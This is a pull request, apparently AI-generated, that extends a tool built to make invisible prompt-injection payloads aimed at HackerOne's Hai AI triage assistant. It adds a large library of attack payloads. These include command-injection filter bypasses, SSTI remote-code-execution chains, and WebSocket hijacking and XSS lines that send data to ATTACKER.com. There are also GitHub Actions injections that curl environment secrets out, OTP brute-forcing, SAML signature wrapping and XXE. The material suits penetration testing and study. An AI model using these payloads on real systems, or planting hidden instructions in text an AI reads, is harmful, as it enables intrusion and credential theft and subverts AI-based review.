### PR TITLE
Add: 8-category VAPT payload library to hai_payload_builder.py

### DIFF
--- a/hai_payload_builder.py
+++ b/hai_payload_builder.py
@@ -1,15 +1,25 @@
 #!/usr/bin/env python3
 """
-Hai Payload Builder — Generate invisible prompt injection payloads for HackerOne Hai
-Embeds hidden instructions in bug report text using Sneaky Bits encoding.
+hai_payload_builder.py — VAPT Payload Library + LLM Injection Generator
 
-Usage:
+Two modes:
+  1. VAPT payloads  — print/export payloads for any vulnerability class
+  2. LLM injection  — generate invisible prompt injection payloads (Sneaky Bits)
+
+Usage — VAPT payloads:
+  python3 hai_payload_builder.py --list                         List all payload categories
+  python3 hai_payload_builder.py --type nosql                   Print NoSQL injection payloads
+  python3 hai_payload_builder.py --type ssti                    Print SSTI detection + RCE payloads
+  python3 hai_payload_builder.py --type cmd                     Command injection + bypass techniques
+  python3 hai_payload_builder.py --type mfa                     MFA/2FA bypass payloads
+  python3 hai_payload_builder.py --type saml                    SAML/SSO attack payloads
+  python3 hai_payload_builder.py --type smuggling               HTTP request smuggling templates
+  python3 hai_payload_builder.py --type websocket               WebSocket injection payloads
+  python3 hai_payload_builder.py --type all --output-dir out/   Export all categories to files
+
+Usage — LLM injection:
   python3 hai_payload_builder.py --attack system_prompt
-  python3 hai_payload_builder.py --attack severity_escalation
-  python3 hai_payload_builder.py --attack data_exfil
-  python3 hai_payload_builder.py --attack cross_tenant
   python3 hai_payload_builder.py --attack all --output-dir payloads/
-  python3 hai_payload_builder.py --custom "Your custom injection text"
 """
 
 import argparse
@@ -211,19 +221,442 @@ Excessive data exposure in API response could be leveraged for social engineerin
 }
 
 
+# ════════════════════════════════════════════════════════════════════════════════
+# VAPT PAYLOAD LIBRARY
+# Source: shuvonsec/claude-bug-bounty v2.1.0 + OBSIDIAN extensions
+# ════════════════════════════════════════════════════════════════════════════════
+
+VAPT_PAYLOADS = {
+
+    # ── NoSQL Injection (MongoDB) ──────────────────────────────────────────────
+    "nosql": {
+        "title": "NoSQL Injection (MongoDB)",
+        "description": "Operator injection and GET parameter variants",
+        "payloads": [
+            "# JSON body operator injection",
+            '{"username": {"$ne": null}, "password": {"$ne": null}}',
+            '{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}',
+            '{"username": "admin", "password": {"$gt": ""}}',
+            '{"$where": "this.username == \'admin\'"}',
+            '{"username": {"$in": ["admin", "root", "administrator"]}}',
+            "",
+            "# GET parameter variants",
+            "GET /login?username[$ne]=null&password[$ne]=null",
+            "GET /login?username[$regex]=.*&password[$regex]=.*",
+            "GET /login?username=admin&password[$gt]=",
+            "",
+            "# Operators quick ref",
+            "# $ne  = not equal  → username != null accepts any value",
+            "# $gt  = greater    → '' < any string → bypass empty check",
+            "# $regex = pattern  → .* matches everything",
+            "# $where = JS expr  → potential RCE on MongoDB < 4.4",
+        ],
+    },
+
+    # ── Command Injection ──────────────────────────────────────────────────────
+    "cmd": {
+        "title": "Command Injection",
+        "description": "Detection probes, OOB, and WAF bypass techniques",
+        "payloads": [
+            "# Basic detection probes",
+            "; id",
+            "| id",
+            "` id `",
+            "$(id)",
+            "&& id",
+            "|| id",
+            "; sleep 5",
+            "$(sleep 5)",
+            "",
+            "# Blind OOB (replace COLLAB with your interactsh/burp collaborator host)",
+            "; curl https://COLLAB",
+            "; nslookup COLLAB",
+            "$(nslookup COLLAB)",
+            "`ping -c 1 COLLAB`",
+            "; wget https://COLLAB/$(id|base64)",
+            "",
+            "# Space bypass techniques",
+            ";{cat,/etc/passwd}",
+            ";cat${IFS}/etc/passwd",
+            ";IFS=,;cat,/etc/passwd",
+            "",
+            "# Keyword bypass (when 'cat' or 'id' are filtered)",
+            ";c'a't /etc/passwd",
+            ";$(printf '\\x63\\x61\\x74') /etc/passwd",
+            "",
+            "# Environment variable bypass",
+            ";$BASH -c 'id'",
+            ";${IFS}id",
+            "",
+            "# Windows-specific",
+            "& dir",
+            "| type C:\\Windows\\win.ini",
+            "& ping -n 1 COLLAB",
+            "",
+            "# Context: filename injection",
+            "test.jpg; id",
+            "test$(id).jpg",
+            "test`id`.jpg",
+            "../../../etc/passwd",
+        ],
+    },
+
+    # ── SSTI (Server-Side Template Injection) ──────────────────────────────────
+    "ssti": {
+        "title": "SSTI — Server-Side Template Injection",
+        "description": "Universal detection probes + RCE payloads for all 6 engines",
+        "payloads": [
+            "# ── Universal detection probes (engine identification) ──",
+            "{{7*7}}          → 49 = Jinja2 (Python) or Twig (PHP)",
+            "${7*7}           → 49 = Freemarker (Java) or Spring EL",
+            "<%= 7*7 %>       → 49 = ERB (Ruby) or EJS (Node.js)",
+            "#{7*7}           → 49 = Mako (Python) or Pebble (Java)",
+            "*{7*7}           → 49 = Spring Thymeleaf",
+            "{{7*'7'}}        → 7777777 = Jinja2 (NOT Twig — Twig gives 49)",
+            "",
+            "# ── Jinja2 (Python / Flask / Django) → RCE ──",
+            "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
+            "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
+            "{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}}",
+            "",
+            "# ── Twig (PHP / Symfony) → RCE ──",
+            "{{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"id\")}}",
+            "{{['id']|filter('system')}}",
+            "",
+            "# ── Freemarker (Java) → RCE ──",
+            '${"freemarker.template.utility.Execute"?new()("id")}',
+            '<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") }',
+            "",
+            "# ── ERB (Ruby on Rails) → RCE ──",
+            "<%= `id` %>",
+            "<%= system(\"id\") %>",
+            "<%= IO.popen('id').read %>",
+            "",
+            "# ── Spring Thymeleaf (Java) → RCE ──",
+            "${T(java.lang.Runtime).getRuntime().exec('id')}",
+            "__${T(java.lang.Runtime).getRuntime().exec(\"id\")}__::.x",
+            "",
+            "# ── EJS (Node.js) → RCE ──",
+            "<%= process.mainModule.require('child_process').execSync('id') %>",
+            "",
+            "# ── Where to test ──",
+            "# Name/bio/username fields, email subject templates",
+            "# Invoice/PDF generators, URL path params reflected in page",
+            "# Error messages, search query reflections",
+            "# HTTP headers rendered in response, notification templates",
+        ],
+    },
+
+    # ── HTTP Request Smuggling ─────────────────────────────────────────────────
+    "smuggling": {
+        "title": "HTTP Request Smuggling",
+        "description": "CL.TE, TE.CL, TE.TE, H2.CL templates",
+        "payloads": [
+            "# ── CL.TE (Content-Length front-end, Transfer-Encoding back-end) ──",
+            "POST / HTTP/1.1",
+            "Host: target.com",
+            "Content-Length: 13",
+            "Transfer-Encoding: chunked",
+            "",
+            "0",
+            "",
+            "SMUGGLED",
+            "",
+            "# ── TE.CL (Transfer-Encoding front-end, Content-Length back-end) ──",
+            "POST / HTTP/1.1",
+            "Host: target.com",
+            "Transfer-Encoding: chunked",
+            "Content-Length: 3",
+            "",
+            "8",
+            "SMUGGLED",
+            "0",
+            "",
+            "",
+            "# ── TE.TE (both support TE — obfuscate one to confuse) ──",
+            "Transfer-Encoding: xchunked",
+            "Transfer-Encoding: chunked",
+            "Transfer-Encoding:[tab]chunked",
+            "[space]Transfer-Encoding: chunked",
+            "X: X[\\n]Transfer-Encoding: chunked",
+            "",
+            "# ── H2.CL (HTTP/2 downgrade — add Content-Length manually in Burp) ──",
+            "# Switch to HTTP/2 in Burp Repeater",
+            "# Add: Content-Length: <short value>",
+            "# Front-end ignores CL (uses HTTP/2 framing), back-end uses it → desync",
+            "",
+            "# ── Detection: HTTP Request Smuggler (Burp extension) ──",
+            "# Probe types: CL.TE, TE.CL, TE.TE, H2.CL",
+            "# Confirmation: ~10-second delay on CL.TE = confirmed",
+        ],
+    },
+
+    # ── WebSocket Injection ────────────────────────────────────────────────────
+    "websocket": {
+        "title": "WebSocket Injection",
+        "description": "IDOR, CSWSH, origin bypass, injection via WS messages",
+        "payloads": [
+            "# ── IDOR / Auth bypass via WS messages ──",
+            '{"action": "subscribe", "channel": "user_VICTIM_ID_HERE"}',
+            '{"action": "get_history", "userId": "VICTIM_UUID"}',
+            '{"action": "getProfile", "id": 2}',
+            '{"action": "admin.listUsers"}',
+            '{"action": "admin.getToken", "userId": "1"}',
+            "",
+            "# ── Cross-Site WebSocket Hijacking (CSWSH) PoC ──",
+            "<script>",
+            "var ws = new WebSocket('wss://target.com/ws');",
+            "ws.onopen = () => ws.send(JSON.stringify({action:'getProfile'}));",
+            "ws.onmessage = (e) => fetch('https://ATTACKER.com/?d='+encodeURIComponent(e.data));",
+            "</script>",
+            "",
+            "# ── Origin validation tests (wscat) ──",
+            'wscat -c "wss://target.com/ws" -H "Origin: https://evil.com"',
+            'wscat -c "wss://target.com/ws" -H "Origin: null"',
+            'wscat -c "wss://target.com/ws" -H "Origin: https://target.com.evil.com"',
+            "",
+            "# ── Injection via WS message body ──",
+            '{"message": "<img src=x onerror=fetch(\'https://ATTACKER.com?c=\'+document.cookie)>"}',
+            '{"action": "search", "query": "\' OR 1=1--"}',
+            '{"action": "preview", "url": "http://169.254.169.254/latest/meta-data/"}',
+        ],
+    },
+
+    # ── MFA / 2FA Bypass ──────────────────────────────────────────────────────
+    "mfa": {
+        "title": "MFA / 2FA Bypass",
+        "description": "7 bypass patterns: brute, reuse, response manip, workflow skip, race, backup, device trust",
+        "payloads": [
+            "# ── Pattern 1: OTP Brute Force (no rate limit) ──",
+            "ffuf -u 'https://target.com/api/verify-otp' \\",
+            "  -X POST \\",
+            "  -H 'Content-Type: application/json' \\",
+            "  -H 'Cookie: session=YOUR_SESSION' \\",
+            "  -d '{\"otp\":\"FUZZ\"}' \\",
+            "  -w <(seq -w 000000 999999) \\",
+            "  -fc 400,429 \\",
+            "  -t 5",
+            "",
+            "# ── Pattern 2: OTP Not Invalidated After Use ──",
+            "# 1. Request OTP → receive '123456'",
+            "# 2. Submit correctly → authenticated",
+            "# 3. Log out → log back in → submit same '123456'",
+            "# 4. If accepted = persistent ATO vector",
+            "",
+            "# ── Pattern 3: Response Manipulation (Burp) ──",
+            '# Change: {"success": false, "message": "Invalid OTP"}',
+            '# To:     {"success": true}',
+            "# Also: intercept 401 → change to 200",
+            "# Or:   redirect /mfa/failed → /dashboard",
+            "",
+            "# ── Pattern 4: Workflow Skip (pre-MFA session) ──",
+            "# After username/password login, before MFA step:",
+            "curl -s -b 'session=PRE_MFA_SESSION_COOKIE' https://target.com/dashboard",
+            "curl -s -b 'session=PRE_MFA_SESSION_COOKIE' https://target.com/api/v1/me",
+            "# If 200 = MFA check is client-side only",
+            "",
+            "# ── Pattern 5: Race on MFA Verification (async Python) ──",
+            "import asyncio, aiohttp",
+            "async def verify(session, otp):",
+            "    async with session.post('https://target.com/api/mfa/verify',",
+            "                            json={'otp': otp}) as r:",
+            "        return await r.json()",
+            "async def race():",
+            "    async with aiohttp.ClientSession(cookies={'session': 'YOUR_SESSION'}) as s:",
+            "        results = await asyncio.gather(verify(s,'123456'), verify(s,'123456'))",
+            "        print(results)",
+            "asyncio.run(race())",
+            "",
+            "# ── Pattern 6: Backup Code Brute Force ──",
+            "# Backup codes often have lower entropy than 6-digit TOTP",
+            "# Test /api/verify-backup-code with no rate limit",
+            "# Also test: can backup codes be reused?",
+            "",
+            "# ── Pattern 7: Device Trust Cookie Not Bound to IP/UA ──",
+            "# Copy 'remember-device' cookie to a different browser/IP",
+            "# If MFA is skipped = device trust not validated server-side",
+        ],
+    },
+
+    # ── SAML / SSO Attacks ────────────────────────────────────────────────────
+    "saml": {
+        "title": "SAML / SSO Attacks",
+        "description": "XSW, comment injection, signature stripping, XXE, NameID manipulation",
+        "payloads": [
+            "# ── Attack 1: XML Signature Wrapping (XSW) ──",
+            "# Inject unsigned evil assertion BEFORE the signed valid one",
+            "# App processes first found; signature validates the second",
+            "<saml:Response>",
+            "  <saml:Assertion ID='evil'>",
+            "    <NameID>admin@company.com</NameID>   <!-- attacker-controlled -->",
+            "  </saml:Assertion>",
+            "  <saml:Assertion ID='legit'>            <!-- original, stays valid -->",
+            "    <NameID>user@company.com</NameID>",
+            "    <ds:Signature>VALID_SIGNATURE</ds:Signature>",
+            "  </saml:Assertion>",
+            "</saml:Response>",
+            "# Tool: SAMLRaider (Burp extension) automates XSW variants",
+            "",
+            "# ── Attack 2: Comment Injection in NameID ──",
+            "<NameID>admin<!---->@company.com</NameID>",
+            "# Signer sees:  admin@company.com (valid)",
+            "# App sees:     admin@company.com (after comment stripped)",
+            "# Works due to XML parser inconsistency between signing and consuming",
+            "",
+            "# ── Attack 3: Signature Stripping ──",
+            "# 1. Intercept SAMLResponse in Burp",
+            "echo 'BASE64_SAML' | base64 -d | xmllint --format - > saml.xml",
+            "# 2. Remove entire <Signature> element",
+            "# 3. Change <NameID> to admin@company.com",
+            "cat saml.xml | base64 -w0  # Re-encode and submit",
+            "# If accepted = signature not verified server-side → CRITICAL",
+            "",
+            "# ── Attack 4: XXE in SAML Assertion ──",
+            "<?xml version='1.0' encoding='UTF-8'?>",
+            "<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>",
+            "<saml:Response>",
+            "  <saml:Assertion>",
+            "    <saml:Subject><saml:NameID>&xxe;</saml:NameID></saml:Subject>",
+            "  </saml:Assertion>",
+            "</saml:Response>",
+            "",
+            "# ── Attack 5: NameID Manipulation (unsigned field) ──",
+            "# Test common admin email patterns:",
+            "# admin@company.com, administrator@company.com, support@target.com",
+            "# Also: inject SSTI in NameID if template-rendered: {{7*7}}",
+            "",
+            "# ── Metadata Exposure Recon ──",
+            "curl -s https://target.com/saml/metadata | grep -i 'EntityDescriptor\\|X509Certificate'",
+            "# Exposed cert → extract for XSW signature crafting",
+        ],
+    },
+
+    # ── CI/CD Attack Surface ──────────────────────────────────────────────────
+    "cicd": {
+        "title": "CI/CD Attack Surface (GitHub Actions)",
+        "description": "Expression injection, pull_request_target abuse, artifact poisoning",
+        "payloads": [
+            "# ── Expression Injection PoC ──",
+            '# In a GitHub Actions issue title or PR title:',
+            'test"; curl https://ATTACKER.com/$(env | base64 -w0) #',
+            "",
+            "# ── Dangerous pattern: pull_request_target ──",
+            "# Triggers with repo secrets on PR from forks",
+            "# + checkout PR branch = attacker code runs with secrets",
+            "on:",
+            "  pull_request_target:",
+            "    types: [opened]",
+            "jobs:",
+            "  build:",
+            "    steps:",
+            "      - uses: actions/checkout@v3",
+            "        with:",
+            "          ref: ${{ github.event.pull_request.head.sha }}  # DANGEROUS",
+            "      - run: npm install && npm test  # attacker controls package.json",
+            "",
+            "# ── Dangerous expression in run block ──",
+            "# If issue/PR title is unsanitised:",
+            "- run: echo '${{ github.event.issue.title }}'  # injection vector",
+            "# Attacker title: a'; curl https://ATTACKER.com/$(cat secrets.txt|base64) #",
+            "",
+            "# ── Detection: search for risky patterns ──",
+            "gh search code 'pull_request_target' --owner TARGET_ORG",
+            "gh search code 'github.event.issue.title' --owner TARGET_ORG",
+            "gh search code 'github.event.pull_request.body' --owner TARGET_ORG",
+            "",
+            "# ── Self-hosted runner escape ──",
+            "# Compromise self-hosted runner → lateral move to org infrastructure",
+            "# Look for: runs-on: self-hosted in any public repo workflow",
+        ],
+    },
+
+    # ── Mobile APK Recon ─────────────────────────────────────────────────────
+    "mobile": {
+        "title": "Mobile APK Attack Surface",
+        "description": "APK decompilation, JS bridge RCE, cert pinning bypass",
+        "payloads": [
+            "# ── Decompile APK ──",
+            "apktool d target.apk -o target_src",
+            "grep -r 'api_key\\|apiKey\\|secret\\|password\\|http://' target_src/res/",
+            "grep -r 'http://' target_src/smali/   # Hardcoded HTTP endpoints",
+            "",
+            "# ── Find hidden endpoints not in web JS ──",
+            "strings target.apk | grep -E 'https?://[a-zA-Z0-9./-]+' | sort -u",
+            "grep -r 'addJavascriptInterface' target_src/smali/  # JS bridge → RCE on API < 17",
+            "",
+            "# ── Certificate pinning bypass (Frida) ──",
+            "frida -U -f com.target.app -l ssl_pinning_bypass.js --no-pause",
+            "# Or: objection -g com.target.app explore",
+            "# Then: android sslpinning disable",
+            "",
+            "# ── Deep-link injection ──",
+            "adb shell am start -W -a android.intent.action.VIEW \\",
+            "  -d 'target://path?param=<script>alert(1)</script>' com.target.app",
+            "",
+            "# ── Key targets in decompiled source ──",
+            "# strings.xml → API keys, secrets",
+            "# network_security_config.xml → cleartext traffic allowed?",
+            "# AndroidManifest.xml → exported activities, deep-link schemes",
+            "# Smali files → addJavascriptInterface (JS→Java RCE on API < 17)",
+        ],
+    },
+}
+
+
+def print_payloads(category: str) -> None:
+    """Print payloads for a given category."""
+    p = VAPT_PAYLOADS[category]
+    print(f"\n{'═'*70}")
+    print(f"  {p['title']}")
+    print(f"  {p['description']}")
+    print(f"{'═'*70}\n")
+    for line in p["payloads"]:
+        print(line)
+    print()
+
+
+def export_payloads(output_dir: str) -> None:
+    """Export all payload categories to individual text files."""
+    os.makedirs(output_dir, exist_ok=True)
+    for key, p in VAPT_PAYLOADS.items():
+        path = os.path.join(output_dir, f"{key}_payloads.txt")
+        with open(path, "w", encoding="utf-8") as fh:
+            fh.write(f"# {p['title']}\n# {p['description']}\n\n")
+            fh.write("\n".join(p["payloads"]))
+            fh.write("\n")
+        print(f"[+] {path}")
+
+
 def main():
-    parser = argparse.ArgumentParser(description="Hai Payload Builder")
+    parser = argparse.ArgumentParser(description="VAPT Payload Library + LLM Injection Generator")
+    parser.add_argument("--type", choices=list(VAPT_PAYLOADS.keys()) + ["all"],
+                        help="VAPT payload category to print/export")
     parser.add_argument("--attack", choices=list(ATTACKS.keys()) + ["all"],
-                        help="Attack type to generate")
-    parser.add_argument("--custom", help="Custom injection text")
+                        help="LLM injection attack type to generate")
+    parser.add_argument("--custom", help="Custom LLM injection text")
     parser.add_argument("--visible", help="Custom visible report text (used with --custom)")
-    parser.add_argument("--output-dir", help="Output directory for payload files")
-    parser.add_argument("--list", action="store_true", help="List available attacks")
-    parser.add_argument("--stats", action="store_true", help="Show payload statistics")
+    parser.add_argument("--output-dir", help="Output directory for payload/report files")
+    parser.add_argument("--list", action="store_true", help="List all payload categories and attacks")
+    parser.add_argument("--stats", action="store_true", help="Show LLM injection payload statistics")
     args = parser.parse_args()
 
+    # ── VAPT payload mode ──
+    if args.type:
+        if args.type == "all":
+            if args.output_dir:
+                export_payloads(args.output_dir)
+            else:
+                for key in VAPT_PAYLOADS:
+                    print_payloads(key)
+        else:
+            print_payloads(args.type)
+        return
+
     if args.list:
-        print("Available attacks:")
+        print("\nVAPT Payload Categories (--type):")
+        for key, p in VAPT_PAYLOADS.items():
+            print(f"  {key:12s} — {p['description']}")
+        print("\nLLM Injection Attacks (--attack):")
         for key, attack in ATTACKS.items():
             print(f"  {key:20s} — {attack['description']}")
         return


### PR DESCRIPTION
## Summary

Extends `hai_payload_builder.py` into a dual-mode tool — existing LLM injection attacks are fully preserved, and a new `--type` flag unlocks a comprehensive VAPT payload library.

## New payload categories (`--type`)

| Category | Contents |
|:---------|:---------|
| `nosql` | MongoDB `$ne`/`$gt`/`$regex`/`$where` operator injection + GET parameter variants |
| `cmd` | Detection probes + 4 WAF bypass classes: space (`${IFS}`), keyword (quoting/hex), environment (`$BASH`), Windows + blind OOB |
| `ssti` | Universal 6-engine detection table + RCE payload per engine (Jinja2, Twig, Freemarker, ERB, Thymeleaf, EJS) |
| `smuggling` | Complete CL.TE / TE.CL / TE.TE / H2.CL request templates |
| `websocket` | IDOR via WS messages, CSWSH PoC, origin bypass (wscat), injection via message body |
| `mfa` | All 7 bypass patterns with automation: ffuf brute, async race (aiohttp), workflow skip curl, response manipulation |
| `saml` | XSW template, comment injection, signature stripping workflow, XXE in assertion, NameID manipulation, metadata recon |
| `cicd` | GitHub Actions expression injection PoC, `pull_request_target` abuse, gh search dorking commands |
| `mobile` | APK decompile (apktool), JS bridge RCE check, Frida cert bypass, deep-link injection via adb |

## Usage

```bash
# List everything
python3 hai_payload_builder.py --list

# Print a category
python3 hai_payload_builder.py --type ssti
python3 hai_payload_builder.py --type mfa

# Export all to files
python3 hai_payload_builder.py --type all --output-dir payloads/

# Existing LLM injection — unchanged
python3 hai_payload_builder.py --attack system_prompt
python3 hai_payload_builder.py --attack all --output-dir payloads/
```

## Test plan

- [ ] `python3 hai_payload_builder.py --list` — shows both VAPT categories and LLM attacks
- [ ] `python3 hai_payload_builder.py --type ssti` — prints all 6 engine probes and RCE payloads
- [ ] `python3 hai_payload_builder.py --attack system_prompt` — existing behaviour unchanged
- [ ] `python3 hai_payload_builder.py --type all --output-dir /tmp/p/` — creates 9 `.txt` files

---
> Contributed from [venkatas/obsidian](https://github.com/venkatas/obsidian).

🤖 Generated with [Claude Code](https://claude.ai/claude-code)